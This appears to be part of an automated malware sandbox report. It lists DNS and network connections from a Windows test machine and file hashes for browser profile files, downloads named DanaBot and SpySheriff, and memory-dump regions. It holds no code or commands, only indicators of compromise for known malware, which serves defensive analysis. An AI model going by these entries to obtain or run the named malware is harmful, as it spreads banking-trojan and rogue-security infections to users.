US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 172.217.169.42:443 ajax.googleapis.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 216.58.213.2:443 ep1.adtrafficquality.google udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 216.239.32.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 client-side-metrics.eu.criteo.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 178.250.1.54:443 client-side-metrics.eu.criteo.net tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 163.70.147.23:443 connect.facebook.net udp
GB 163.70.147.23:443 connect.facebook.net udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.facebook.com udp
IE 31.13.73.35:443 www.facebook.com udp
IE 31.13.73.35:443 www.facebook.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 216.58.201.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.24:443 measurement-api.criteo.com tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 download.zip.dll-files.com udp
FR 143.244.56.58:443 download.zip.dll-files.com tcp
FR 143.244.56.58:443 download.zip.dll-files.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
IT 2.18.255.68:443 www.bing.com udp
IT 2.18.255.68:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
IT 2.18.255.93:443 r.bing.com udp
IT 2.18.255.93:443 r.bing.com udp
IT 2.18.255.115:443 th.bing.com udp
IT 2.18.255.115:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.27.82:443 www.bing.com tcp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6eac9d05429a9358b608d44d94784e10
SHA1 73395ed98fee0a7a2f8585c37a8811bd8837585d
SHA256 0bf0ae5a65a11d2714b2ac12a424cd38ed0a8b7e7530ec59362786b1a832eb60
SHA512 235731c2c6a85f6ada201f4e4c061ce7db201a2e82c04334a5bfcbfdba60f9ac1b99a06e9ac1e9bbea1651b16747fa4e44f68f6882a960671b6b613f51213c18

\??\pipe\crashpad_4936_KJZHPWNWOOTLXDJW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a7bd3d5922ae81414e7944b805a7d35a
SHA1 e46d09db68c10c1fa46f3e38f65ab8263bcebc5c
SHA256 bf1e815460636c7eedf53bcf4ce784779c762d894954dc17c5fd6cec76a13695
SHA512 d14a13dddf68d10b0f593ae574e8e80c53e62ca6cf873c730ae34c87a434c1caa74bfa0ce8789ab050beabfa80d323c5dad416cc28c7fb169f9e664f1c2ce030

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cf1d30ca2332aa18881b260bba9417f1
SHA1 a8dc7686399154740a107526f533f6ecdb071137
SHA256 5fb81b7f6083c821a5f8e1e3ff9783dd3d808bb5a7edcac8ad94441a6c101824
SHA512 c6c07d6593dd645640165a5e76b7662d5af298f9a3781c44950b9bf330cb4f58d0939624625148c3bd90e13acf563f6c55091e27ed7f55ffe31545f2ca1b3d9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3913928d36a204b8c7a09f9664615308
SHA1 6f5a2afcf7d4f9ba5d201c4575ee7ea5cbc904bc
SHA256 5cd63a20006de4c006a47a6b3a922a53b15bda4fbfd14e77b8a5416583c8f9b9
SHA512 25f2410c171fb2c64bd4a3706a3a3b5de6f694cbebe555cc223996fd3a16d346737594d4cc09a737484d8a5e3a0ea33e0705ac60481b51857bdb3127a7996145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 164a788f50529fc93a6077e50675c617
SHA1 c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256 b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512 ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 9909f25844a1ac13b891bf462008cc5a
SHA1 62a89cf9811ec7836d31ae1cfcadeea40d449262
SHA256 30f323427ba600b0f21e8688973f0521d909ae20004238a4b37a8af67892af88
SHA512 abb2b081701327aef555d5ece7d883473bb604ac92e6d94986f26d12a348a35ff9c2d06de93aa746b6f7ed3fa6ced66366882c73172315c2e7503cd82c40d782

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 a025da0ebcf89247ff9b629cf9102d84
SHA1 6edb404e1e926439e927c76de4797fa4e39100b3
SHA256 6a987bcb93b542e404cdb5996a911a818e3ac3c9fcd9fa5e0903a16f137bc21e
SHA512 9880b122b449fcf43609991ba8bfe0c1acb271a654d20ebb9e59ed96e11efd89ae034acd939c49e0fbb798a41195282e56f5cc1e6387362de0deb863f242499a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Temp\scoped_dir4936_847988428\6eeca731-58f6-454b-b9a0-9b69c3cd474f.tmp

MD5 cc05ed3e66468e692745ba6563c69740
SHA1 eae9dbd4d36aa91fd43f7d452ac3d252b103759d
SHA256 fb1311fb7142825abacb3c7aedddf948f5c9b258e447c953ce0f7f4b19c6dfff
SHA512 4b527db02d6ea36b914558a3e44fd3d15772bf2be4ba0a640bf70427af07dcde5ed6967930cc3624a244cfc82290f125eea2754812586216b3d5a37757ce8db4

C:\Users\Admin\AppData\Local\Temp\090c6243-2cb7-4625-badf-088de9eebab7.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Temp\76624c06-9455-46b1-831c-65bc5339ed29.tmp

MD5 78e47dda17341bed7be45dccfd89ac87
SHA1 1afde30e46997452d11e4a2adbbf35cce7a1404f
SHA256 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA512 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 06d55006c2dec078a94558b85ae01aef
SHA1 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

MD5 d11d7533c72bb4f2e791d05650a45e2e
SHA1 eb1383e1d99a1c78ce2721fee15043eb7d498f63
SHA256 3d7124bd67434b44501704e52f34ba05d545541b01335cf5fbbcefde11703ba5
SHA512 52188a97e95b96b4ae1c219baead33cd56b84ebc82131fbb7312c379d4d847944491f42e17def5a22351796c1f4eadcbe66455162207c888eb93e7fdb1b46d71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js

MD5 3d20584f7f6c8eac79e17cca4207fb79
SHA1 3c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA256 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c5e635cdb0e61c5e4c7203669f195a68
SHA1 04eb8119bae584e6802f3d269f17000b86ed4f19
SHA256 11ccb733e7f7238fd2d95c4e15f8c409923975fa18e24cd37aa4428b7830fbe4
SHA512 534d14b0354566128f5ce1c16a2168975273ccea36420fe4816b7ae9b48d13e1852995aed68b2e534430079f69fa1098c864727c6801067213c2e07b7f342453

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 65e997c55db45b534d70d9024d14def1
SHA1 0962b3269c79e1d2e647cfac3e11f195f233ce38
SHA256 9d65e4ad5d0b08bc3ddd38588e0e16565b94938f3c8584391f2464dffdfa9f0f
SHA512 38bf81e0bab3a25f4a7eb01d309e6691ae9a0df507c633dc94305103d369733bfc1546abee7a0d3324104c96e9e86cd954d230b5aa97c61844422e013ac410f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 84614b13d358af20a58da2b2e90b671e
SHA1 b3ccb056457d2c2bf7639372dbcecd5e5b9f29e0
SHA256 72e1fe9dc4e6990cfd9636823254eba771fcaa03d35a1c53d20c9427cf5bece1
SHA512 b8b29b202bf68e8b1a1b97d2e7c11497eeaa46401998eb9fb09f074a2b144234ea9d4f9692c8d1abe09cde06b71c475cdf88ac5e7858d69955d5508f9bd79d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index~RFe578c13.TMP

MD5 acc0238398e33ea10f4ba5cc651860b9
SHA1 1cbdcd9511c38d8e1b4ba5972a71d6ed15ab749e
SHA256 1a40b8594e30215b08ba2f1b597130f1a7f405b36977bdea732609e127c94416
SHA512 dd6836e8b76494027f20d02c5ddc2135c86eca379fa0fd0c939cd4dfc8736c51fc5031628b2cdab7fb673cd210391a5c3d36a304635ab6be597422ba41401686

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index

MD5 bf3bba0d5b278b7276367a6acd394ce6
SHA1 74ce01e356fc234decf50b358cf1a8c5b7ae6865
SHA256 b94292449f57a5d2250e3d9b11748bdb946a6b89847a5a2daa392667babe57ec
SHA512 47b9d67b907d574e7aa982a9500a15ddd6cd934e087543fe15f0b58a6e6b1bca201fd8edd3774954c5bce4915395de356d72fd38c4698dc7bf1f8c4d2648cef4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 aa09337019e09f44c09d1951e82f26d8
SHA1 38bd6301adfe6e248d3570a43e78be875b0493ca
SHA256 222dc494fa24b738863ab79c9db5a9901c721ab802c9a88ea45c59fc0c2b8468
SHA512 148f614ebdb9cb4a307e7dd2ae445ae44414b078e027f10faf37900d1787b5ca652de2559f5985ccb0609aff66cb22ca6182fb9dddc0e1b6934a353e35d1d034

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe57d4e4.TMP

MD5 ea05c6b44fbc6cef0216798e455c60a2
SHA1 9ef3efbd93cb53f324c31a76563f7c0e1abeb747
SHA256 f5ba5e1582687fc1da53257a2be9ecda811061bffe5d41e02233e118bc43ac47
SHA512 0a96cde7e8ba6434c54c9ce20771beb2173422c29cc440d11fb6c3a907793a9d147dbcc3ff9a240c2adfcf87355c3d96f012576f5bd8c301702cdfa88142a844

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7ae766bc26dd294f838e6edb5b5c9e36
SHA1 de0fd07fa49709c762129db80b80d0cd449d3971
SHA256 79d06c6f75c3309c8d2ad55715036adb0f5b06a05597294056b197211c60c9ae
SHA512 059caf08068c5c9f8b5891d0dec005de9671070be5fe93e408723f002a4935663af36370a350802b77936ea069623eb7cc3bc4d9a748330f6bf22fde8d0b0816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 50637954d77a6b8865002d1d51400e92
SHA1 206fa223982c7997251b73b2cab11fa6061fe660
SHA256 3443afc6c1a126e6b45dc09fdce216a904ac7d3e943ff3c3499a633c3c3f9f3d
SHA512 eabb0e21c75232b037fcbd4c955c2f3ef32f56c12762bec3679d2d42c37851c4acb7abb1621f3cd123b8ffc2972c7f46fc1c26b31d63f3e512246d7640eb0736

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 959cdfac1874528cd68b35debbb7485a
SHA1 83755fe2f3c62fe30befb7d89848fae96ac37603
SHA256 2d01e9835055b72ee8919adde14f63f95c0ccf6ae2447682983dc7c761fcdf41
SHA512 9e69fbd4966628126dcfe80dd280ae315ccc04c2c99a550a58b692cf7ceeb3cd135c8f6e439edee9b3e6fa01f649e1070466adece7b124156fbe7c19c55d2b6d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f405.TMP

MD5 0137cc8c41ef78d807f6630dd8f5c300
SHA1 66fdfa830bdd3b437952dd81c790cfbeafee06ba
SHA256 233369a3112a51adebaf09aca3a51008834db4481c94abe942aa299ecffd8e15
SHA512 b77023f204e2c5d04009f0fe7a165931a6febbe13160c8bb1f55ac4445e95237f4e5000dceb05dae9c4c2bafb2cd06bdde5219271571eb33ffa95f3555854d93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 edd31b43bb3abe8c9328e7534e8fd296
SHA1 af216e4dad381810af7a7c5ff15672411abca4aa
SHA256 2f4cb9c6afbb59393ec9b73b91c4c2bae396297b54be27419b73b03661d1d4a6
SHA512 736e270387e75cc7c1db40c4b22e96afd04e41d99d463f51415de6a3d40ec8c0a60e3b50231973da0f9540a8ecd5909e115e9cd899a6eef0110f7454bdd1d6c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RFe57fdd8.TMP

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\Downloads\DanaBot.exe.crdownload

MD5 48d8f7bbb500af66baa765279ce58045
SHA1 2cdb5fdeee4e9c7bd2e5f744150521963487eb71
SHA256 db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1
SHA512 aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index

MD5 a8e6c2a6a0bdae41abd0d163398ff3b6
SHA1 0d957d2be61f3824b4e0002d3d03d4088fc33298
SHA256 be6d6198730b2642d065c57e99336c13794624a255b509608636a6eca9986599
SHA512 2ea90aa412f0c49573fb03eae91fe0b01181df6bed0118058fdf826f18bf0c23bf0b19dbddbc13acb07bf1c9a68a1292dc930ee2413f38f2e1fe0a985934d1be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 ebe7fe285f1dd5d2c8b6d33e9b46a1c1
SHA1 2d61d21d305e5da86e5efac6350c03a123625fb6
SHA256 b5c4ebdc747fba9c8c6a0c2282bae47eb40b7a485ceb3c24956788d31597eb64
SHA512 5b996359547ea7a6602481162540f56ca7cc98086f8198979585ae00ce3900a2426a3c29676d04e20baf116d1f4bb3e252d85ac986fee8a57aa941fc0aaf2e45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d81dc824b89d0f501e29061598284d29
SHA1 31e504d4bba10bdad8cc97c877016dd00582c804
SHA256 31c23b44f5046ab8b2643b00a3d8ff7588fedb5a853da56282b640a7c07c12c1
SHA512 5c9beec15e1c042eca196bec849e634d1132c330164c5ed28d887506ba6cdae80afe771149f3a0448f3d392909867ce3702480eaa6beba85dce039fb0adafe20

C:\Users\Admin\Downloads\DanaBot.dll

MD5 7e76f7a5c55a5bc5f5e2d7a9e886782b
SHA1 fc500153dba682e53776bef53123086f00c0e041
SHA256 abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3
SHA512 0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

memory/4812-1706-0x00000000022D0000-0x000000000253B000-memory.dmp

memory/5524-1723-0x0000000002850000-0x0000000002ABB000-memory.dmp

memory/2748-1726-0x0000000002100000-0x000000000236B000-memory.dmp

memory/1324-1727-0x0000000000400000-0x0000000000AAD000-memory.dmp

memory/5768-1728-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 83f12cd0f590658af49a07f6aab8c5d2
SHA1 71a9e252259f5ba79dcadd06e6f77f0bb4065faa
SHA256 0ca62c516ddddc4bb25acc3031efd80853e1cee96aa30c268ca6366fefd824d0
SHA512 22255ed211d3b272f57704b2f10f152a458bc065c8ee469d9b977e5d11de972fe2c68f06d134f6971b4f0801b56afca771af7bf59d9ade2d49c1d631ff0136f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5c77f65888afe6d631778cefd95a9a41
SHA1 b3ff5bc7528b1ab4af9a9d337da3e412cff53923
SHA256 8142ec00e48057ef3e20468a14e75349e0a1a32bf1bc8a4510bbf5236fe5b4e1
SHA512 10885f53f9c3500b508d2ba4df79dfe2201071a1111c71cea844be65a9b7cfcc7e0c98968465159d7540a5eac13901719a4280c07c7b908b872a716fe5ee7a7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 3bca8411b45106afaa963d562c371631
SHA1 78857d33a65e7061ca18a3540c304f01e7e85325
SHA256 4503345ee70aa9ca0f90012b665743d7c13ec7052e7a943222287973b752b9c7
SHA512 a6a7e9af6613a30730a0b87be76f87144a3483afb756445d462de7b22543027e5e8f5822e0337ba2d7b65e413e526da962783d05d226c0d13d113d57d28b56ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe58435d.TMP

MD5 22ed3cc04fcc2e66b81335c4395971fd
SHA1 12ef48d70ec6f360644d2573dde99756f6ac05fb
SHA256 27bffcff6642dfcb87ac33eea61059552bc35ccd3c0d9f4da550398351836df9
SHA512 9219928d246a8aa761ee289b0baacc7214b028976b1b890c7f1df38ecac61cb3a90e8af1b3861929155d07af304d58ae8f7304466769669a7cd40c55ae61cf40

memory/4184-1785-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 84c60ede10b92218eb715af214f2d336
SHA1 c4bda62ada9f29dd38e38c615fffc2dde4ba7287
SHA256 f05d8562c71aa0caf758bf60f7453213eba2ab3d87aafbe11b4e7efeb3100f7b
SHA512 64326adaf1a4a904840807f40d33e46dad815522f0e88f3bd5ca31f6cb35b87f6927c050c7ec25c1fe1dfe71da036bb195c015e5e0a9b040e24782f697fff5ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5843ea.TMP

MD5 053fcd7b7eeffc66d85205926d5b35e1
SHA1 63d10e2d8e9f7693d8244b458e78be5061abe5aa
SHA256 f5e045b791b276b030597ffe069ef75e3968267584f3c94853aa3a21cc5150c2
SHA512 69a08dedaf4e1cb998a32fe4dd1a5818f43ed5a666e9c342c7dffb2ec94b7f5d400851b647bdf4297d4d48a4fc33679168ffda6b0a09af7ad6514228c46cdd0b

memory/5524-1809-0x0000000002850000-0x0000000002ABB000-memory.dmp

memory/2748-1810-0x0000000002100000-0x000000000236B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 52ad489a9df9a6992472b9dc93dc0bbf
SHA1 cf619e5fac29004ad31894a2768e9a5d79a1bfdd
SHA256 a7cdcf9de105c4bc84d0a77242f38240195fe87fa5522168523407afbe800ed0
SHA512 6323de92a6a94538e5f48eacab8d77e8310b5e956a5b448dcad6c412eddea6c3321a98866539ab6ca9a37772702637de2e24148eb14ae3184e0030a49fdcb98a

memory/5144-1811-0x0000000000400000-0x0000000000AAD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d3069d59486de0b93bad6134e48a9f77
SHA1 640791c7a7c52d9c4420be7401b6251ba338efbc
SHA256 a5da0107e0f747d3aac2dcd0d0cf53ee6f61a3ff4b5eb1ebbc47fe96b25a606e
SHA512 3d7c12d165fd609c33e5a731e8dd07ec60becc0ffac441bb70d9d454b5833951bc831720d84c86cfb76f59d8eadb71b2849f4d0f16b7dcbd5be4930c3beb6028

C:\Users\Admin\Downloads\SpySheriff.exe

MD5 ab3e43a60f47a98962d50f2da0507df7
SHA1 4177228a54c15ac42855e87854d4cd9a1722fe39
SHA256 4f5f0d9a2b6ef077402a17136ff066dda4c8175ceb6086877aaa3570cabb638f
SHA512 9e3365c7860c4766091183d633462f1cc8c30d28871ae2cd8a9a086ce61c0bccf457f919db6826b708f0cf4f88e90f71185420edc4756b7d70137e2096f8797f

memory/5452-1848-0x0000000000400000-0x000000000040E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2c0a33808d7f6b8a0aee903434f14e74
SHA1 983f7156d76b8408e9ef673ef5fbc241c6ae947a
SHA256 2ac6d78e00d5a5dc42d25ef38f61c8319eb7e65dac4997ec0dd10b34f6035baa
SHA512 d206e53e1533f9bc77515835b55e21863f0f1cdf0cd947568d00b7fada5353ac698cb4db3c1240addb6f6fff081ce6f351df182b8c1f611b8e6faa84f2fd7ab3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 63443cddd56d14e4a9add94f02f71a35
SHA1 2e1f44753adbdb5640545aac10856c68261d8b74
SHA256 8850876679814d9a09e8d68a026c1dc853f3a8f2ecff40bb0c3b0d623ba5c027
SHA512 e2eb2123da79cac55c9a134d3e56c59a7b91640eb574b21cc8a97923cf190652366d97d49d7eba68acf3f9a0bff05888c98503959956ec7bb5991c0d5faabf38

